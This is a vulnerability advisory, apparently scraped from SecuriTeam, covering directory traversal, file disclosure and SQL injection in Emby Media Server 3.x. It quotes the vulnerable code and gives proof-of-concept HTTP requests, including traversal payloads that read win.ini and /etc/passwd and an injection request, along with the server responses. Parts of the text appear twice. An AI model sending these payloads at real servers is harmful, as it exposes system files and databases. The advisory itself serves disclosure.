SSD Advisory – Emby Media Server Multiple Vulnerabilities

April 25, 2017 admin Directory Traversal, File Disclosure, SecuriTeam Secure Disclosure, SQL Injection

Credit to Author: Maor Schwartz| Date: Tue, 25 Apr 2017 05:03:48 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom

Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Emby Media Server.

Affected versions are: 3.1.5, 3.1.2, 3.1.1, 3.1.0 and 3.0.0.

Emby Media Server (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client server model. Two comparable media servers are Plex and Windows Media Center.

The vulnerabilities found in Emby Media Server are:

Directory Traversal
File Disclosure
SQL Injection

Credit
An independent security researcher Gjoko Krstic from Zero Science Lab has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor Response
Emby has been notified in March 2017 about the vulnerability, shortly after they have released a new version that addresses this vulnerabilities. They however have not provided any version information or release notes that reflect this.

Vulnerabilities Details

Directory Traversal File Disclosure
Emby Media Server is suffer from Directory Traversal File Disclosure vulnerability. Input passed via the ‘swagger-ui‘ object in SwaggerService.cs is not properly verified before being used to load resources. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.

Version 3.1.0 is affecting Linux, Windows and Mac platforms.

Version 3.1.5 only affects Windows release.

Vulnerable Code
Vulnerable file path: /Emby.Server.Implementations/HttpServer/SwaggerService.cs

 using MediaBrowser.Controller;  using MediaBrowser.Controller.Net;  using System.IO;  using MediaBrowser.Model.IO;  using MediaBrowser.Model.Services;    namespace Emby.Server.Implementations.HttpServer  {      public class SwaggerService : IService, IRequiresRequest      {          private readonly IServerApplicationPaths _appPaths;          private readonly IFileSystem _fileSystem;            public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)          {              _appPaths = appPaths;              _fileSystem = fileSystem;              _resultFactory = resultFactory;          }            /// <summary>          /// Gets the specified request.          /// </summary>          /// <param name=”request”>The request.</param>          /// <returns>System.Object.</returns>          public object Get(GetSwaggerResource request)          {              var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, “swagger-ui”);                var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace(‘/’, _fileSystem.DirectorySeparatorChar));                return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;          }            /// <summary>          /// Gets or sets the result factory.          /// </summary>          /// <value>The result factory.</value>          private readonly IHttpResultFactory _resultFactory;            /// <summary>          /// Gets or sets the request context.          /// </summary>          /// <value>The request context.</value>          public IRequest Request { get; set; }      }  }

Proof of Concept

An attacker sends the following request (when Emby runs on a Windows machine):

 GET /emby/swagger-ui/…………………………..windowswin.ini HTTP/1.1

1	GET /emby/swagger–ui/................................windowswin.ini HTTP/1.1

The server responds with:

 HTTP/1.1 200 OK  X-UA-Compatible: IE=Edge  Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS  Access-Control-Allow-Origin: *  Vary: Accept-Encoding  ETag: “07bec80f76d20d26dd300a855219d321”  Cache-Control: public  Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50  Content-Type: application/octet-stream  Date: Thu, 22 Dec 2016 10:43:53 GMT  Content-Length: 403  Connection: close    ; for 16-bit app support  [fonts]  [extensions]  [mci extensions]  [files]  [Mail]  MAPI=1  [MCI Extensions.BAK]  3g2=MPEGVideo  3gp=MPEGVideo  3gp2=MPEGVideo  3gpp=MPEGVideo  aac=MPEGVideo  adt=MPEGVideo  adts=MPEGVideo  m2t=MPEGVideo  m2ts=MPEGVideo  m2v=MPEGVideo  m4a=MPEGVideo  m4v=MPEGVideo  mod=MPEGVideo  mov=MPEGVideo  mp4=MPEGVideo  mp4v=MPEGVideo  mts=MPEGVideo  ts=MPEGVideo  tts=MPEGVideo

HTTP/1.1 200 OK

X–UA–Compatible: IE=Edge

Access–Control–Allow–Headers: Content–Type, Authorization, Range, X–MediaBrowser–Token, X–Emby–Authorization

Access–Control–Allow–Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS

Access–Control–Allow–Origin: *

Vary: Accept–Encoding

ETag: “07bec80f76d20d26dd300a855219d321”

Cache–Control: public

Server: Mono–HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50

Content–Type: application/octet–stream

Date: Thu, 22 Dec 2016 10:43:53 GMT

Content–Length: 403

Connection: close

; for 16–bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

[MCI Extensions.BAK]

3g2=MPEGVideo

3gp=MPEGVideo

3gp2=MPEGVideo

3gpp=MPEGVideo

aac=MPEGVideo

adt=MPEGVideo

adts=MPEGVideo

m2t=MPEGVideo

m2ts=MPEGVideo

m2v=MPEGVideo

m4a=MPEGVideo

m4v=MPEGVideo

mod=MPEGVideo

mov=MPEGVideo

mp4=MPEGVideo

mp4v=MPEGVideo

mts=MPEGVideo

ts=MPEGVideo

tts=MPEGVideo

When Emby runs on a Linux machine a similar request:

 http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

1	http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Would yield this server response:

 root:x:0:0:root:/root:/bin/bash  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  bin:x:2:2:bin:/bin:/usr/sbin/nologin  sys:x:3:3:sys:/dev:/usr/sbin/nologin  sync:x:4:65534:sync:/bin:/bin/sync  …  …

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

...

SQL Injection

Emby suffers from a blind SQL injection vulnerability. Input passed via the GET parameter ‘MediaTypes’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code without authentication.

Proof of Concept
An attacker sends the following request:

 GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo’&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1  Host: 10.211.55.3:8096  accept: application/json  x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36  x-emby-authorization: MediaBrowser Client=”Emby Mobile”, Device=”Chrome 55.0.2883.87″, DeviceId=”104a154d5aa8c9576a2508113b47a53b6170253c”, Version=”3.1.0.0″, UserId=”abb355429db54e159ac2a7a3cbd6eb12″  Accept-Encoding: gzip, deflate, sdch  Accept-Language: en-US,en;q=0.8  Connection: close

GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo‘&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1

Host: 10.211.55.3:8096

accept: application/json

x–mediabrowser–token: ba5a68dfa1134bd6af642228bbf757bb

User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

x–emby–authorization: MediaBrowser Client=“Emby Mobile”, Device=“Chrome 55.0.2883.87”, DeviceId=“104a154d5aa8c9576a2508113b47a53b6170253c”, Version=“3.1.0.0”, UserId=“abb355429db54e159ac2a7a3cbd6eb12”

Accept–Encoding: gzip, deflate, sdch

Accept–Language: en–US,en;q=0.8

Connection: close

Server response:

 HTTP/1.1 500 Internal Server Error  Content-Type: text/html  Server: Mono-HTTPAPI/1.0  Date: Tue, 21 Feb 2017 12:06:09 GMT  Content-Length: 64  Connection: close    Exception of type ‘SQLitePCL.pretty.SQLiteException’ was thrown.

HTTP/1.1 500 Internal Server Error

Content–Type: text/html

Server: Mono–HTTPAPI/1.0

Date: Tue, 21 Feb 2017 12:06:09 GMT

Content–Length: 64

Connection: close

Exception of type ‘SQLitePCL.pretty.SQLiteException’ was thrown.

https://blogs.securiteam.com/index.php/feed